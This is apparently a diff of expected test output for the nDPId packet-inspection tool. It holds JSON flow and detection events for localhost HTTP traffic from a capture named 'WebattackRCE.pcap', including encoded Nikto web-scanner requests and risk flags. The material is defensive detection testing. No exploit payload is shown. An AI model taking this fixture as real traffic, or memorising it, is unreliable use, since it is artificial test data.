-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576420276577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276577,"pkt":"AAAAAAAAAAAAAAAACABFAAC5VktAAEAG5fF\/AAABfwAAAcGIH5Al+2Gy82DXQ4AYAED+rQAAAQEICp1m+omdZvqJR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpQb3J0IENoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576420276660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276660,"pkt":"AAAAAAAAAAAAAAAACABFAAC27PBAAEAGT09\/AAABfwAAAcGKH5BK6tTkZxKX74AYAED+qgAAAQEICp1m+tydZvrcR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpnZXRpbmZvKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 